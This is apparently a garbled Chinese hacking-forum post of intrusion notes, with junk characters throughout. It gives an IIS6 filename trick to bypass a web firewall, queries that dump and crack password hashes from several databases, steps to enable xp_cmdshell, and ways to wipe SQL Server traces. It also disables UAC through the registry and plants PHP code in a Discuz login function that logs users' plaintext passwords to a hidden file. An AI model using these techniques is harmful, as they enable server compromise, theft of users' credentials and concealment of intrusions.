利用II6文件解析漏洞绕过安全狗代码:: C2 |! _% g; Z& o# B$ e* p" S/ B
;antian365.asp;antian365.jpg R$ [5 ^) O+ V* N5 g# }3 o5 Z+ T
+ K8 O! K9 Z# n" e' H: l各种类型数据库抓HASH破解最高权限密码!
. ~0 G0 R& v( ]1.sql server2000
/ |+ i6 M/ f. q6 ^SELECT password from master.dbo.sysxlogins where name='sa' p; C+ k2 s& v/ F+ b
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
9 W& R9 S* Z. C# u; h5 m5 {2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
! [2 O$ s+ ~3 Q: e3 ^" b
& r, `+ d$ X, r7 _7 u$ c0×0100- constant header( j$ j' @5 o% @8 X# p$ D
34767D5C- salt$ R0 g0 h i3 X" i7 [
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
4 m% l% E; A8 |* v7 b* M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
- u0 |3 c1 `! T1 ]crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
+ w3 V" K# z0 s; I/ C: xSQL server 2005:-
2 @+ T" _7 F2 M2 j/ v5 ISELECT password_hash FROM sys.sql_logins where name='sa'. I S# `" J; k3 b
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F+ a) K$ L& p* |) b6 f
0×0100- constant header2 u( z) l& w! U
993BF231-salt
* j% i) g+ m) X! R7 Z( I2 m0 p5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash, Y4 n9 I+ \) F4 X
crack case sensitive hash in cain, try brute force and dictionary based attacks.! U& {# ?) C: q9 n9 k, R/ r
( W9 U* G0 H2 j& M1 B4 i; ?. [update:- following bernardo’s comments:-& \. L8 i- _. }; `+ {8 {
use function fn_varbintohexstr() to cast password in a hex string.. g6 }" Z! D+ L! ]6 x/ o( J
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
# } q# a! N+ ]& }7 w" p( W4 ^0 u, q# x3 M- q) i) K+ H
MYSQL:-- \7 f, e! @# t: t" e3 i/ r
/ X$ r6 s9 p! \% ~8 M
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 o# E. ~% t# h' U' U; v" S
: ~; m& n! N, Y# T- Q5 X*mysql < 4.1! d9 \+ ~, [" n$ c4 b! z
; R4 ~5 o" Q r5 k" o: Imysql> SELECT PASSWORD(‘mypass’);8 u+ x: f1 B! ~
+——————–+
! K& x. i4 }3 a+ B# |/ O| PASSWORD(‘mypass’) |4 m* Z5 V, l. ~7 Y q
+——————–+1 I4 x" p" D( x* p1 Q
| 6f8c114b58f2ce9e |: E k' [* f/ ~- n
+——————–+
( E) M( t9 ~7 K$ ?+ |
7 H T" `% ~7 F6 M6 h*mysql >=4.1
* O; l( w* Q. z# p& H% @0 b- \
1 b% V5 I! ?$ x( ^mysql> SELECT PASSWORD(‘mypass’);
, X; G% k* G d, G: p1 @+——————————————-+0 i6 G0 K- ^; l
| PASSWORD(‘mypass’) |
+ X6 u8 X: `; m; _' _. D- o4 F% M+——————————————-+
9 _3 M5 X6 n- H9 f5 g| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: ^3 M0 A8 Y7 ?6 h f: m
+——————————————-+$ ^: e/ R- P! E1 h# C ]
4 X/ c1 t0 F m7 n
Select user, password from mysql.user! U- P7 d# \1 l
The hashes can be cracked in ‘cain and abel’) Z) [* ]) U8 c# B% Z3 Z& w
: M; Y6 `: H$ ~
Postgres:-
2 k+ |( ?8 U+ s: u3 \" D5 s {Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)" s; k" V n3 K: B+ m, Q
select usename, passwd from pg_shadow;+ u: r3 L# C$ b+ O+ o$ V( q
usename | passwd' l( ]4 f0 J2 N+ Q. J& a" {
——————+————————————-' D& w7 V1 S w4 {
testuser | md5fabb6d7172aadfda4753bf0507ed4396# O3 k. ~) T9 Y) j# D( D
use mdcrack to crack these hashes:-
* v6 k3 X6 ]( t2 {. G5 Z$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
! @, s& Y; i' W! f$ f
( [+ i0 y ?: T9 e0 N: k+ i) aOracle:-
) G' p: N- E z! {2 J1 f6 w; `select name, password, spare4 from sys.user$
6 d ]. u B5 b$ h2 thashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g! x( [% d, s* J1 R) H; ]
More on Oracle later, i am a bit bored….4 j# T& x# R [
: s* Z$ J! N1 n2 t
, x! A8 U: M; J5 ~" h6 n8 ^5 y r l在sql server2005/2008中开启xp_cmdshell. u2 l; J$ Y4 j, L1 W& G
-- To allow advanced options to be changed.) k' s: x) ~8 E& S" R
EXEC sp_configure 'show advanced options', 1
, w" R9 i3 g t: uGO7 G1 r# {2 V. \- S! N
-- To update the currently configured value for advanced options.+ F; t9 g; |( a' s
RECONFIGURE
8 b( ?. G2 E, Z$ z' p2 rGO
$ D. P, J5 J, P$ g0 I2 H-- To enable the feature.
# J! h2 }% x* F) Y9 b8 DEXEC sp_configure 'xp_cmdshell', 1% b# m" s' e+ S" X
GO( ]0 X$ K& w- X+ ?7 A( A; W
-- To update the currently configured value for this feature.9 h }2 B6 W4 S
RECONFIGURE/ `% H m) c- `# ~) f, @ N, G
GO
, S2 j) P# v9 g6 ` A) ~ OSQL 2008 server日志清除,在清楚前一定要备份。) O9 I O* T6 M
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
% w3 a* v/ K: [& Y' O) sX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin, x6 p8 Y W1 T
0 @2 L% Z8 v. H. T' R
对于SQL Server 2008以前的版本:: {) D/ Z! g; j3 {1 E! V1 L; w
SQL Server 2005:! t0 t' E& ?' v' m; {* |
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat2 q5 W1 G6 h1 x# p9 Z* W( K& v) L x5 L" M
SQL Server 2000:
$ P1 E( S) f/ |: D" x+ _清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
/ i$ Y. s) Q/ s8 T, g/ y, M( I* g6 e3 Z% M+ R0 z+ u# ^* y
本帖最后由 simeon 于 2013-1-3 09:51 编辑
, M5 x( n' [7 f; D7 ]7 r) }5 p: M3 ?0 K$ d
3 U( |6 T! T4 U" L
# v* h. x, h+ l- }windows 2008 文件权限修改! T; G- I) o% u5 w0 ^0 x I
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx7 }# ?$ P+ S I$ u7 o M" X
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
3 z$ a+ A. |& ?6 k ]一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
+ L+ `& X4 l! ?: t# C* N/ E6 D) L8 O; U9 y% a, D
Windows Registry Editor Version 5.006 w1 H+ q" g) `/ e1 @
[HKEY_CLASSES_ROOT\*\shell\runas]5 A5 P5 X; b" q
@="管理员取得所有权"
6 q9 O% V4 k1 h: T" j5 q"NoWorkingDirectory"=""
" m4 t4 O! p6 P1 M6 _[HKEY_CLASSES_ROOT\*\shell\runas\command]' H$ Y) _& r& ^: F
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 _: n- @( S$ W. F"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* o4 u, ~5 s9 K3 u2 s[HKEY_CLASSES_ROOT\exefile\shell\runas2]& t( c3 Z. z1 E4 K. f: L
@="管理员取得所有权"
- v6 h. f7 M" U"NoWorkingDirectory"=""
& s% }) _" Z2 ~[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
" O- F: Z( `2 |) \@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 ]9 U5 D8 Z( Z1 P* C"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. J" P2 c7 \7 M# i
, h% n5 [" }7 L5 K: {[HKEY_CLASSES_ROOT\Directory\shell\runas]
" K# N0 f, g: |1 m$ N@="管理员取得所有权"
9 ]% x1 C2 e6 T* L; z+ p"NoWorkingDirectory"=""8 @4 {2 {9 o- m" k) r$ j
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]% F# F/ H2 j N" M) g4 V
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
: W7 u5 l/ t3 _" d7 p9 J# _- n"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; ] k0 _; e* V% q; b1 q' f; [
* z$ z& B2 q9 r6 L b% m$ x/ ~1 c, ?
# C0 Z& W2 _8 ^
win7右键“管理员取得所有权”.reg导入% R5 o/ `: r" E4 t- e6 f
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,* x% o V: ^# q' Y' r& K
1、C:\Windows这个路径的“notepad.exe”不需要替换
! U& |+ V+ W6 X/ m$ R2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
) p4 q, N) X7 z/ m, z' H! D5 p) a# f0 X3、四个“notepad.exe.mui”不要管5 V; ~& W; m, q* }' ~+ Z' R, K
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
$ A* C2 m) Y! F0 ~) b4 K8 sC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”, V9 R2 | ^6 c0 ]5 j# Y, S+ e/ f
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,$ v9 i: I! ?5 O0 [% ~
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。" S1 |7 q/ u' u
windows 2008中关闭安全策略: , ^+ O6 V5 T ]
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
* I6 d( g) D1 h修改uc_client目录下的client.php 在
9 c+ a) c: F' z4 {; x' Zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% c Y/ f2 w* y$ n" |9 O ~' F下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
$ I5 O+ X. U) O' x2 }你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw2 \, w4 m* M" n6 Z2 ~- o
if(getenv('HTTP_CLIENT_IP')) {+ @# N# m& c0 u& H" h) e* _: a
$onlineip = getenv('HTTP_CLIENT_IP');+ {( } n8 z2 E: w
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {+ U4 a9 C, X+ h# c% K3 A( J, M- b
$onlineip = getenv('HTTP_X_FORWARDED_FOR');% b5 O0 w& n* S5 E
} elseif(getenv('REMOTE_ADDR')) {; ^9 S7 y3 {1 j, L; o! a
$onlineip = getenv('REMOTE_ADDR');& _) n7 S; H9 k( H K
} else {* D, @/ T6 I+ O: c
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
, h! H" ~8 G0 ~* `5 L}, i: f4 u$ g7 [9 z0 U: P( o$ @
$showtime=date("Y-m-d H:i:s");* B N, {9 ]6 s: l7 Q6 h( A
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
+ a p, A7 u& K6 | $handle=fopen('./data/cache/csslog.php','a+');
* q* @8 E2 o( S& C# } $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对